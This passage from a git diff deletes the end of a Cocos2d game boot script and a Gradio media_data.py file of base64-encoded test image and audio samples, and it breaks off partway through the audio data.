cc.DebugMode.INFO : cc.DebugMode.ERROR, - showFPS: (!false && !false) && settings.debug, - frameRate: 60, - jsList: jsList, - groupList: settings.groupList, - collisionMatrix: settings.collisionMatrix, - renderMode: 1 - } - - cc.game.run(option, onStart); - } - - if (false) { - BK.Script.loadlib('GameRes://libs/qqplay-adapter.js'); - BK.Script.loadlib('GameRes://src/settings.js'); - BK.Script.loadlib(); - BK.Script.loadlib('GameRes://libs/qqplay-downloader.js'); - qqPlayDownloader.REMOTE_SERVER_ROOT = ""; - var prevPipe = cc.loader.md5Pipe || cc.loader.assetLoader; - cc.loader.insertPipeAfter(prevPipe, qqPlayDownloader); - // - boot(); - return; - } - - if (false) { - require(window._CCSettings.debug ? 'cocos2d-js.js' : 'cocos2d-js-min.335ee.js'); - require('./libs/weapp-adapter/engine/index.js'); - var prevPipe = cc.loader.md5Pipe || cc.loader.assetLoader; - cc.loader.insertPipeAfter(prevPipe, wxDownloader); - boot(); - return; - } - - if (window.jsb) { - require('src/settings.b2ff5.js'); - require('src/jsb_polyfill.js'); - boot(); - return; - } - - if (window.document) { - var splash = document.getElementById('splash'); - splash.style.display = 'block'; - - var cocos2d = document.createElement('script'); - cocos2d.async = true; - cocos2d.src = window._CCSettings.debug ? 'cocos2d-js.js' : 'cocos2d-js-min.335ee.js'; - - var engineLoaded = function () { - document.body.removeChild(cocos2d); - cocos2d.removeEventListener('load', engineLoaded, false); - if (typeof VConsole !== 'undefined') { - window.vConsole = new VConsole(); - } - boot(); - }; - cocos2d.addEventListener('load', engineLoaded, false); - document.body.appendChild(cocos2d); - } - -})(); diff --git a/spaces/HighCWu/anime-colorization-with-hint/gradio-modified/gradio/media_data.py b/spaces/HighCWu/anime-colorization-with-hint/gradio-modified/gradio/media_data.py deleted file mode 100644 index ecbb7442a6c7c1a13f24418bea01e74aeee4d033..0000000000000000000000000000000000000000 --- a/spaces/HighCWu/anime-colorization-with-hint/gradio-modified/gradio/media_data.py +++ /dev/null @@ -1,8655 +0,0 @@ -BASE64_IMAGE = ( # test/test_files/bus.png - "data:image/png;base64," - 
"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" -) -BASE64_AUDIO = { - "name": "test/test_files/audio_sample.wav", - "data": 
"data:audio/wav;base64,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